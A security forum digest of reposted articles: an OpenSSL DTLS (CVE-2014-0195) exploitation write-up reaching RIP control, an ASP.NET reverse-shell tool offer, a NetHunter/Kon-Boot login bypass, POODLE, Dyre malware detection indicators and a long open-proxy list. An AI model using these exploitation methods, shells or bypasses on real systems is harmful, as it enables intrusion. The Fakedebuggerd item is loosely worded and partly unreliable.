downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory. Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1“; this causes the OpenSSL tool to listen on Port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught: The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()). DTLS Exploitation After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This will serve as a great learning experience because it will teach us how attackers think, what their process is and what other weakness they might use to fully leverage the bug. For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS. Once a target service is running, the next step involves attaching to the process, setting breakpoints to the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. Understanding the allocations that occur after the message buffer allocation allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk), and therefore, targeted for overwrite. After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug to a fairly limited “write arbitrary data to the address pointed to by pointers found in the process” exploit primitive: In the context of DTLS, pitem is a linked list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure: The hm_fragment structure contains information about the fragmented handshake message state, and more importantly, the message buffer pointer (hm_fragment.fragment). Every time a handshake fragment parsed, the related pitem of the handshake is retrieved, pitem.data is casted to a hm_fragment* and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment: Therefore, using the bug to point pitem.data somewhere in the process address space so that pitem.(hm_fragment*)data->fragment is aligned to a pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points to. To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset +0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure. Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer: We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting: WriteN Primitive Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141: As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive: Execution (RIP) Control Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000): Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point at. An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd: In turn, that pointer points somewhere in the writable .data section of libc: Looking at the data near stderr in the libc, we can see that stderr+0x18 is an interesting function pointer — which is actually a function pointer dereferenced by malloc() when requesting additional memory from the system: Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved: Conclusion After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug. Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again. In the end, an attacker’s persistence is what transforms software bugs into working reliable exploits, and as software developers, it is good to always keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products. Sursa: CVE-2014-0195: Adventures in OpenSSL's DTLS Fragmented Land

InsomniaShell – ASP.NET Reverse Shell Or Bind Shell InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. ASP.NET is an open source server-side Web application framework designed for Web development to produce dynamic Web pages. It was developed by Microsoft to allow programmers to build dynamic web sites, web applications and web services. It was first released in January 2002 with version 1.0 of the .NET Framework, and is the successor to Microsoft’s Active Server Pages (ASP) technology. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language. A bind shell is basically binding the command prompt to a listening port on the compromised machine, a reverse shell is sending a command prompt to a listening port on the attackers machine (used when the hacked server doesn’t have a public IP). InsomniaShell has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. If the provider page is running on a server with a local SQL Server instance, the shell includes functionality for a named pipe impersonation attack. This requires knowledge of the sa password, and results in the theft of the token that the SQL server is executing under. You can download InsomniaShell here: InsomniaShell.zip Sursa: InsomniaShell - ASP.NET Reverse Shell Or Bind Shell - Darknet - The Darkside

[h=3]The POODLE bites again (08 Dec 2014)[/h] October's POODLE attack affected CBC-mode cipher suites in SSLv3 due to SSLv3's under-specification of the contents of the CBC padding bytes. Since SSLv3 didn't say what the padding bytes should be, implementations couldn't check them and that opened SSLv3 up to an oracle attack. We're done pretty well at killing off SSLv3 in response to that. Chrome 39 (released Nov 18th) removed fallback to SSLv3 and Chrome 40 is scheduled to remove SSLv3 completely. Firefox 34 (released Dec 1st) has already removed SSLv3 support. We're removing SSLv3 in favour of TLS because TLS fully specifies the contents of the padding bytes and thus stops the attack. However, TLS's padding is a subset of SSLv3's padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn't check the padding bytes but that wouldn't cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections. This was noted by, at least, Brian Smith on the TLS list ([1][2]) and I was sufficiently cynical to assume that there were probably more instances of this than the old versions of NSS that Brian cited, and so wrote a scanner for the issue. Unfortunately, I found a number of major sites that had this problem. At least one of whom I had good enough contacts at to quickly find that they used an F5 device to terminate connections. I contacted F5 on October 21st and they started working on a fix. Yngve Pettersen also independently found this issue and contacted me about it around this time. F5 reported that some of the affected sites weren't customers of theirs, which meant that there was (at least) a second vendor with the same issue. After more digging, I found that some A10 devices also have this problem. I emailed a number of contacts at A10 on October 30th but sadly didn't get a reply from any of them. It wasn't until November 13th that I found the right person at A10 to deal with this. F5 have posted patches for their products and A10 should be releasing updates today. I'm not completely sure that I've found every affected vendor but, now that this issue is public, any other affected products should quickly come to light. (Citrix devices have an odd behaviour in this area in that they'll accept padding bytes that are all zeros, but not random padding. That's unexpected but I can't make an attack out of it.) Ivan Risti? has added a test for this issue to his excellent scanner at SSLLabs. Affected sites will have their grade set to F and will report “This server is vulnerable to the POODLE attack against TLS servers”. This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad. While RC4 is fundamentally broken and no implementation can save it, attacks against MtE-CBC ciphers have repeatedly been shown to be far more practical. Thankfully, TLS 1.2 support is about to hit 50% at the time of writing. Sursa: https://www.imperialviolet.org/2014/12/08/poodleagain.html

[h=1]Security Analysis of a Full-Body Scanner[/h] Full-body scanners (also known as “advanced imaging technology”) are used as the primary passenger screening mechanism in airports across the United States and many other countries. Despite their critical role in aviation security, these scanners have never been tested for effectiveness, privacy, or safety in a rigorous study that is independent of the manufacturers and government agency customers. This study documents the results of the first such independent evaluation of the Rapiscan Secure 1000, an X-ray backscatter machine that was deployed at TSA airport checkpoints between 2009 and 2013. In laboratory tests with a real machine, we were able to conceal guns, knives, and explosive simulants in such a way that they were not visible to the scanner operator. We also studied the cyberphysical security of the machine and were able to show how an attacker could subvert the operator console software so that it would be possible to conceal all types of contraband. Learn more: Press release Full research paper Image gallery Frequently asked questions (FAQ) [h=2]The Team[/h] The study is a collaboration between researchers at the University of California, San Diego, the University of Michigan, and Johns Hopkins University. To contact the entire team, email radsec-team@umich.edu. Keaton Mowery, Ph.D. student, University of California, San Diego Eric Wustrow, Ph.D. student, University of Michigan Tom Wypych, Ph.D. student, University of California, San Diego Corey Singleton, Radiation Safety Officer, University of California, San Diego Chris Comfort, Health Physicist, University of California, San Diego Eric Rescorla, Visiting Scholar, University of California, San Diego Stephen Checkoway, Assistant Research Professor, Johns Hopkins University J. Alex Halderman, Assistant Professor, University of Michigan Hovav Shacham, Associate Professor, University of California, San Diego Sursa: https://radsec.org/

Bypassing Windows and OSX Logins with NetHunter & Kon-boot DriveDroid support in Kali Linux NetHunter The Kali Linux NetHunter platform has many hidden features which we still haven’t brought to light. One of them is the DriveDroid application and patch set, which have been implemented in NetHunter since v1.0.2. This tool allows us to have NetHunter emulate a bootable ISO or USB, using images of our choosing. That’s right, you can use NetHunter as a boot device which holds a library of bootable ISOs and images…And so we begin: Installing Kali Linux Unattended using your Android Phone Yes, this is actually doable. We can easily generate a custom Kali ISO which has a self installing preseed file and have NetHunter boot it on a target machine. You load up DriveDroid, select the self installing ISO, plug in the USB cable, and reboot the target computer…..and all of a sudden, the Kali Linux install screen whizzes by, and starts installing itself with no user interaction… Bypassing Windows and OSX Logins Using NetHunter and Kon-Boot While the NetHunter HID attacks can provide us pre-programmed keyboard strokes which end up compromising the target machine – what happens if the target machine is turned off, or otherwise requires a login to access? The NetHunter HID attack would be useless at this point. Enter Kon-Boot, a must-have tool for anyone performing physical security assessments. As a quick reminder, Kon-Boot is a boot-kit which will silently boot and bypass the authentication process of Windows/OSX based operating systems, without overwriting your old passwords. We went ahead and purchased a commercial version of Kon-Boot, and tried using the provided Kon-Boot image file as our bootable USB payload. Lo and behold, when we plugged in our NetHunter device USB cable to a target computer, the Kon-Boot image booted and allowed us to bypass a Windows 8.1 login screen. Check out the video below to see it in action: Although this technology isn’t new, this implementation of it is pretty awesome, and complements the NetHunter arsenal of tools and features perfectly. Whats more, this has been battle tested in real-world onsite physical pentests we’ve performed and has proven to be extremely effective. Stay up to date with Kali Linux NetHunter Features As NetHunter development continues, we will try our hardest to make sure we keep you updated with all the existing and upcoming features of this awesome platform. To stay updated with our blogs and posts, make sure you follow us on twitter: Sursa: http://www.offensive-security.com/kali-linux/bypassing-windows-and-osx-logins-with-nethunter-kon-boot/

Dyre Attackers Shift Tactics December 8, 2014 By Ronnie Tokazowski On December 4th, several employees using PhishMe’s Reporter Button for Outlook reported new waves of Dyre phishing. The email appeared normal at first, but further analysis showed that the attackers have made a big shift in order to remain hidden. Here’s what the email looks like: Figure 1 — Dyre phishing email I’m not sure if this was on purpose, if the attacker’s script had some trouble, or if they were click happy, but the same user received several voice message emails. Figure 2 — Several emails reported with the PhishMe Reporter button Upon clicking the link, the user is presented with the option to download a zip file that contains an executable. Once the user visits the page, the background code also renders a counter that counts clicks. Figure 3 — GET request for the counter We can see that this counter has tracked around 10,000 clicks. These aren’t unique, as refreshing the page makes the counter increment by one. Figure 4 — Counter used by Dyre attackers The attackers are also changing the file names per download. Thankfully in our case, the hashes still match. Figure 5 — Hashes of files downloaded from Dyre campaign Once executed, the malware (in this case, Upatre) downloads an encoded payload which is Dyre. Upatre likes to use update-related user-agent strings when grabbing the payload. Figure 6 — Upatre downloading with the user agent string “realUpdate” Upatre also uses other user-agent strings such as “update” and “myupdate”. Looking for user-agent strings that contain these can help find potential infections in a network. Next, Dyre injects into the top-most svchost.exe. We saw this in early versions of Dyre as documented here (http://phishme.com/new-whitepaper-evolution-phish-phishing-delivery-mechanisms/) however it’s only recently that newer versions of Dyre have been capable of injecting into svchost.exe in Windows 7. By dumping the memory, running strings, and grepping for “:443” or “:4443” (ports Dyre uses for communication) we can see C2 IP’s, as well as a new addition. Figure 7 — IP’s dumped from memory with the addition of an i2p address While there is currently no response from this i2p node (Figure 8) there is successful i2p traffic going out from the infected system. (Figure 9) Figure 8 — Failed query for i2p address Figure 9 — Possible i2p traffic attempts For those who are unfamiliar with i2p, think of it as a more secure version of TOR, as things such as the true DNS destination are natively tunneled. I2p has aspects that are peer-to-peer, and every node is considered an exit node. In the case of Dyre, this could be to give the attackers a separate channel for communication, making it more difficult to analyze and detect. However, there are a few things we can do to cut them off. In the memory dump in Figure 7, we can see that the malware is configured to connect to an i2p domain via port 443. In Figure 8, we can see the actual DNS request going out. While we can’t specifically tell what’s going on in this case, by black holing i2p at the top-level domain we stop the propagation of the malware, as well as neuter any possible i2p traffic from a network. On the off chance that the attackers change domains to go over other ports for i2p, by configuring IDS systems to drop “GET /netdb/routerinfo”, we can cut off communications even further. (Figure 10) This applies to both HTTP and HTTPS protocols as well. Figure 10 — Portion of i2p traffic to block Here are the VirusTotal reports for the infections. Upatre: https://www.virustotal.com/en/file/2faf099c27af2c6f93601240e8e5525d6a66abd34a3431929da55982d0e728bc/analysis/ Dyre: https://www.virustotal.com/en/file/5a148aa655b2e175e67205c398736e2a4bfe318cdcc990c1e77da354d8d3db39/analysis/ Thanks to employees clicking the PhishMe Reporter button, we were able to quickly modify our Yara rule to match this latest strain. See the updated Yara rule here: Dyre_12_4 Sursa: Dyre Attackers Shift Tactics - PhishMe

New ‘Fakedebuggerd’ vulnerability in Android 4.x OS lets hackers root access By Vijay on December 8, 2014 · New ‘Fakedebuggerd’ vulnerability in all versions of Android OS upto lollipop, lets hackers root access Security Researchers at Chinese anti-virus company 360 have found out a new vulnerability in the Google’s Android operating system which is named as ‘Fakedebuggerd.’ This new vulnerability allows potential hackers to gain root access to install files and escalate privileges on the smartphones and tablets running on Android OS and run malicious codes at will. As per the 360 researchers, the Fakedebuggerd vulnerability enables a potential attacker to access an area that can be accessed only with system or root permissions. The vulnerability uses two known Android 4.x Privilege Escalation (PE) exploits, ‘FramaRoot’ and ‘TowelRoot’, to run code under root privileges and to install a root toolkit on the device. This allows the potential hacker to hide the code both from the Android user as well as the security solutions running on the devices. As such the hacker may inject any malicious App without users notice. Fakedebuggerd targets Android 4.x devices The vulnerability is of high risk as it gives serious privilege escalation to the handlers of malware and this is the first time the researchers have found out any Privilege Escalation vulnerabilities in Android 4.x. As said above, uses two exploits, TowelRoot’ and ‘FramaRoot’ together which means it has a higher rate of infection as well as higher chances of hiding itself from the AV engines aboard the users device. The Towelroot exploit is based on the futex() syscall vulnerability (CVE-2014-3153). This Linux vulnerability was discovered five months ago by Comex and affects almost all Android devices prior to Android 5.0 lollipop. The other exploit, Framaroot, is basically a rooting tool and based on several exploits for most Samsung, LG, Huawei, Asus and ZTE devices and more. The exploits which form the Framaroot are named after heroes of the popular JRR Tolkein triolgoy “The Lord of the Rings,” like Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. Almost all Android smartphones which are made by the above companies are able to execute Framaroot quite easily which makes Fakedebggerd very powerful vector. Modus Operandi Once the Fakedebuggerd vulnerability is exploited and the root toolkit is deployed on the infected device, malicious code to collects sensitive data like unique identifiers, device versions and network connectivity data. Additionally it will install unnecessary Apps like Flashlight and Calender without the users permission. The Fakedbuggerd is quite aggressive in its intent and uses extreme measures to keep them installed. Even if these Apps are removed by user using root privileges, the Fakedbuggerd reinstalls them automatically using the PE exploit. And as said above due the malware’s perfect hiding technique, simply deleting the suspicious apps wont work in this case. The Fakedbuggerd malware is a serious threat because of its ability to access root privileges and run malware laden codes on infected devices. In today’s world of convergence when the critical and confidential enterprise data and mobile phones are interconnected, Fakebuggerd can cause havoc unseen before. As of now no security solution or antivirus can detect this malware, therefore precaution is the best remedy against getting infected through this vulnerability. Stay away from third-party and unverified APKs and use the official Google Play Apps for download. Even if you have to download a APK, stick with trusted and well-reviewed app developers. Beware fake advertisements (malvertisements) and phishing links on all forms of communication – SMS, email and social networks. Resource : 360 Blog. Sursa: New 'Fakedebuggerd' vulnerability in Android 4.x OS lets hackers root access

[LIST=1]09-12-14 | Fast Proxy Server List (3678) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.161.120.215:9064 1.161.141.187:9064 1.161.154.60:9064 1.164.170.193:8088 1.164.178.230:9064 1.165.107.142:9064 1.165.16.84:8088 1.168.10.162:9064 1.168.228.89:9064 1.168.8.187:9064 1.169.131.190:9064 1.170.121.72:9064 1.171.12.36:9064 1.171.13.30:9064 1.172.21.178:9064 1.172.22.49:9064 1.172.24.123:9064 1.172.29.1:9064 1.173.115.188:9064 1.174.0.72:9064 1.174.141.166:9064 1.174.242.11:9064 1.174.61.238:9064 1.175.42.191:9064 1.191.248.215:8585 1.22.120.108:9064 1.22.132.91:9064 1.23.168.194:9064 1.23.174.25:9064 1.23.189.95:9064 1.34.22.177:9064 1.93.8.169:3128 101.0.60.177:9064 101.1.16.123:3128 101.18.28.127:8585 101.226.12.223:80 101.251.102.122:3128 101.251.226.195:8888 101.251.238.123:8080 101.29.93.218:8585 101.63.156.218:9064 101.63.211.236:9064 101.63.214.28:9064 101.63.89.192:9064 103.16.157.141:80 103.16.177.140:9064 103.18.220.69:8080 103.240.96.40:9064 103.243.114.26:8080 103.248.248.121:8080 104.131.102.107:3128 104.131.81.106:3128 104.140.67.36:7808 104.140.67.36:8089 104.143.5.133:7808 104.143.5.133:8089 104.194.14.68:7808 104.194.14.68:8089 106.1.29.15:9064 106.104.66.93:9064 106.186.24.144:3128 106.218.252.130:9064 106.37.177.251:3128 106.83.238.65:8118 107.150.224.29:3128 107.150.224.29:80 107.150.224.29:8080 107.150.224.29:8180 107.170.254.23:3128 107.182.17.243:7808 107.182.17.243:8089 109.104.144.42:8080 109.236.88.144:25008 109.236.88.144:25012 109.60.249.107:3128 110.173.49.18:3128 110.232.83.38:8080 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.77.181.17:8080 110.77.233.229:3128 110.78.184.115:9064 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:3128 111.1.32.20:8085 111.1.32.20:8086 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8088 111.1.32.24:81 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.133:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.164:80 111.1.36.166:80 111.1.36.167:80 111.1.36.2:80 111.1.36.21:80 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.4:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.1.60.163:80 111.1.61.74:80 111.10.100.155:8123 111.10.100.57:8123 111.10.100.70:8123 111.10.101.103:8123 111.10.101.219:8123 111.10.103.43:8123 111.10.112.162:8123 111.10.112.45:8123 111.10.112.71:8123 111.10.113.231:8123 111.10.114.51:8123 111.10.115.123:8123 111.10.116.206:8123 111.10.117.88:8123 111.10.118.5:8123 111.10.118.63:8123 111.10.12.3:8123 111.10.128.38:8123 111.10.136.187:8123 111.10.136.196:8123 111.10.136.35:8123 111.10.137.177:8123 111.10.138.32:8123 111.10.139.123:8123 111.10.139.185:8123 111.10.14.208:8123 111.10.144.80:8123 111.10.146.107:8123 111.10.146.17:8123 111.10.146.21:8123 111.10.146.251:8123 111.10.146.36:8123 111.10.147.217:8123 111.10.147.231:8123 111.10.147.93:8123 111.10.152.238:8123 111.10.152.81:8123 111.10.153.210:8123 111.10.154.15:8123 111.10.154.65:8123 111.10.155.66:8123 111.10.157.68:8123 111.10.158.216:8123 111.10.161.205:8123 111.10.164.61:8123 111.10.165.56:8123 111.10.165.7:8123 111.10.165.70:8123 111.10.166.194:8123 111.10.166.35:8123 111.10.167.161:8123 111.10.167.80:8123 111.10.168.37:8123 111.10.169.106:8123 111.10.187.140:8123 111.10.187.182:8123 111.10.194.50:8123 111.10.195.65:8123 111.10.198.179:8123 111.10.199.219:8123 111.10.28.197:8123 111.10.44.191:8123 111.10.45.139:8123 111.10.45.35:8123 111.10.48.29:8123 111.10.49.168:8123 111.10.49.255:8123 111.10.57.156:8123 111.10.58.38:8123 111.10.71.110:8123 111.10.79.146:8123 111.10.88.64:8123 111.10.89.182:8123 111.10.89.205:8123 111.10.90.214:8123 111.10.90.75:8123 111.10.98.239:8123 111.10.98.250:8123 111.10.98.76:8123 111.10.99.213:8123 111.119.192.34:8080 111.12.128.167:80 111.12.128.171:80 111.12.128.171:8060 111.12.128.171:8080 111.12.128.172:80 111.12.128.172:8089 111.13.109.51:80 111.13.109.52:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.13.55.3:22 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.174.225.44:8118 111.175.133.129:8585 111.184.102.113:9064 111.185.185.163:9064 111.198.216.86:8585 111.2.241.200:8123 111.206.81.248:80 111.240.110.183:9064 111.240.170.153:9064 111.240.66.51:9064 111.242.199.32:9064 111.242.2.160:9064 111.243.64.246:9064 111.248.178.236:9064 111.248.221.48:8088 111.248.76.82:9064 111.249.96.133:8088 111.250.169.115:9064 111.250.172.95:9064 111.250.189.8:9064 111.250.191.170:8088 111.251.111.191:9064 111.251.122.107:9064 111.251.222.136:9064 111.251.247.46:9064 111.252.135.133:9064 111.252.201.56:9064 111.252.30.229:9064 111.253.144.30:9064 111.253.64.177:9064 111.254.148.210:9064 111.254.161.22:9064 111.254.240.73:9064 111.255.250.160:9064 111.255.53.138:9064 111.40.194.48:80 111.7.129.140:80 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8086 111.7.129.150:8088 111.7.129.151:80 111.7.129.160:80 111.7.129.160:8087 111.7.129.162:80 111.7.129.162:8085 111.7.129.162:8086 111.76.115.67:8585 111.9.125.236:8123 111.9.139.43:8123 111.9.161.81:8123 111.9.174.195:8123 111.9.234.159:8123 111.9.85.132:8123 111.91.38.87:9064 111.91.56.133:9064 111.91.80.166:9064 111.92.17.196:9064 112.0.136.121:8123 112.0.136.123:8123 112.0.192.237:8123 112.0.221.58:8123 112.1.102.150:8123 112.1.172.223:8123 112.1.177.78:8123 112.104.123.239:9064 112.104.89.131:9064 112.105.228.19:9064 112.105.244.92:8088 112.105.84.58:8088 112.124.64.221:8000 112.15.111.27:8123 112.15.118.197:8123 112.15.22.132:8123 112.15.95.210:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.10.204:8123 112.18.152.224:8123 112.18.154.109:8123 112.18.154.6:8123 112.18.155.161:8123 112.18.161.130:8123 112.18.161.170:8123 112.18.161.199:8123 112.18.162.224:8123 112.18.163.239:8123 112.18.163.39:8123 112.18.164.133:8123 112.18.164.171:8123 112.18.164.251:8123 112.18.165.138:8123 112.18.165.226:8123 112.18.167.205:8123 112.18.168.23:8123 112.18.168.79:8123 112.18.170.117:8123 112.18.170.129:8123 112.18.170.176:8123 112.18.170.79:8123 112.18.171.120:8123 112.18.171.188:8123 112.18.172.182:8123 112.18.175.177:8123 112.18.176.53:8123 112.18.177.101:8123 112.18.177.64:8123 112.18.177.90:8123 112.18.178.185:8123 112.18.178.199:8123 112.18.178.85:8123 112.18.179.143:8123 112.18.179.48:8123 112.18.181.164:8123 112.18.184.131:8123 112.18.186.15:8123 112.18.186.240:8123 112.18.186.50:8123 112.18.187.17:8123 112.18.187.177:8123 112.18.187.95:8123 112.18.193.5:8123 112.18.193.60:8123 112.18.194.20:8123 112.18.194.55:8123 112.18.195.110:8123 112.18.196.58:8123 112.18.199.207:8123 112.18.21.131:8123 112.18.23.240:8123 112.18.4.206:8123 112.18.54.103:8123 112.18.54.169:8123 112.18.59.84:8123 112.18.65.35:8123 112.18.68.113:8123 112.18.68.174:8123 112.18.7.234:8123 112.18.71.62:8123 112.18.73.189:8123 112.18.79.148:8123 112.194.138.195:80 112.199.65.210:8080 112.2.204.171:8123 112.20.107.222:8123 112.20.110.61:8123 112.20.117.36:8123 112.20.138.112:8123 112.20.140.92:8123 112.20.140.94:8123 112.20.200.138:8123 112.20.200.71:8123 112.20.205.156:8123 112.20.96.82:18186 112.21.149.3:8123 112.21.176.219:8123 112.21.243.13:8123 112.21.249.213:8123 112.21.252.4:8123 112.22.150.151:8123 112.22.228.246:8123 112.22.228.94:8123 112.22.233.124:8123 112.22.237.65:8123 112.23.105.182:8123 112.23.109.44:8123 112.23.111.81:8123 112.23.61.127:8123 112.24.124.41:8123 112.24.126.197:8123 112.24.40.233:8123 112.24.67.134:8123 112.253.14.227:80 112.253.14.227:8080 112.3.104.101:8123 112.3.109.57:8123 112.3.135.187:8123 112.3.135.66:8123 112.3.165.55:8123 112.3.199.67:8123 112.3.28.29:8123 112.44.213.109:8123 112.44.215.167:8123 112.44.225.6:8123 112.44.226.94:8123 112.44.230.230:8123 112.44.232.43:8123 112.44.234.104:8123 112.44.239.5:8123 112.44.240.118:8123 112.44.240.159:8123 112.44.241.204:8123 112.44.246.7:8123 112.44.252.82:8123 112.45.177.132:8123 112.45.177.140:8123 112.45.182.117:8123 112.45.185.33:8123 112.5.16.50:80 112.85.70.2:80 113.105.224.77:80 113.105.224.79:80 113.107.57.76:3128 113.107.57.76:80 113.19.210.202:9064 113.19.99.92:9064 113.193.88.186:9064 113.21.73.32:9064 113.214.13.1:8000 113.250.101.69:8118 113.252.150.233:3128 113.4.246.213:8585 113.6.252.139:808 114.112.192.195:3128 114.112.91.97:90 114.219.107.201:8585 114.24.200.56:9064 114.24.4.184:9064 114.252.123.90:8118 114.254.147.169:3128 114.255.183.163:8080 114.255.183.164:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.73.178:9064 114.26.78.174:9064 114.27.108.36:9064 114.27.18.224:9064 114.36.136.167:9064 114.36.37.213:9064 114.36.59.90:9064 114.37.100.106:9064 114.37.124.18:9064 114.37.151.139:9064 114.37.186.106:8088 114.37.186.247:9064 114.37.77.174:9064 114.38.225.135:9064 114.38.233.221:9064 114.38.244.193:9064 114.38.83.224:9064 114.39.169.207:9064 114.39.244.150:9064 114.40.103.88:9064 114.40.108.12:9064 114.40.19.99:9064 114.40.63.192:9064 114.40.94.223:9064 114.42.168.111:9064 114.42.67.20:8088 114.43.121.11:8088 114.43.128.63:9064 114.43.17.108:9064 114.43.197.211:9064 114.44.41.69:9064 114.45.24.35:9064 114.45.32.205:9064 114.46.74.149:9064 114.47.173.196:8088 114.47.5.115:8088 114.79.171.175:9064 115.124.89.62:3128 115.154.191.110:3128 115.154.225.119:8585 115.187.48.246:9064 115.236.59.194:3128 115.242.178.128:9064 115.244.232.222:9064 115.248.217.178:3128 115.252.167.220:9064 115.28.137.189:3128 115.29.247.115:8888 115.68.53.117:8080 115.70.67.58:8080 115.71.233.88:8080 115.98.130.142:9064 115.99.0.9:9064 116.193.129.119:9064 116.202.34.78:9064 116.202.42.33:9064 116.203.177.183:9064 116.203.64.214:9064 116.228.55.217:8003 116.228.80.186:8080 116.231.121.89:8080 116.236.216.116:8080 116.248.51.34:8585 116.73.146.128:9064 116.75.104.48:9064 116.75.96.188:9064 117.121.242.8:10080 117.121.242.8:11095 117.121.242.8:13243 117.121.242.8:13669 117.121.242.8:14826 117.121.242.8:15275 117.121.242.8:16442 117.121.242.8:16515 117.121.242.8:21725 117.121.242.8:23685 117.121.242.8:24379 117.121.242.8:29037 117.121.242.8:29832 117.121.242.8:33719 117.121.242.8:33925 117.121.242.8:33942 117.121.242.8:33976 117.121.242.8:34034 117.121.242.8:35010 117.135.194.139:86 117.135.194.52:80 117.135.194.53:80 117.135.194.55:80 117.135.244.41:80 117.139.2.9:8123 117.139.28.8:8123 117.139.29.25:8123 117.139.29.35:8123 117.139.36.253:8123 117.139.38.167:8123 117.139.39.206:8123 117.139.39.78:8123 117.139.39.83:8123 117.139.42.180:8123 117.139.43.31:8123 117.139.43.68:8123 117.139.45.195:8123 117.139.46.101:8123 117.139.46.11:8123 117.139.46.21:8123 117.139.68.186:8123 117.139.71.252:8123 117.146.116.67:80 117.146.116.68:80 117.147.224.12:8123 117.147.225.158:8123 117.148.44.6:8123 117.149.213.144:8123 117.149.239.59:8123 117.162.106.219:8123 117.162.106.237:8123 117.162.106.28:8123 117.162.106.34:8123 117.162.110.208:8123 117.162.116.206:8123 117.162.124.233:8123 117.162.125.55:8123 117.162.128.193:8123 117.162.15.135:8123 117.162.165.37:8123 117.162.166.147:8123 117.162.168.147:8123 117.162.169.63:8123 117.162.170.209:8123 117.162.170.5:8123 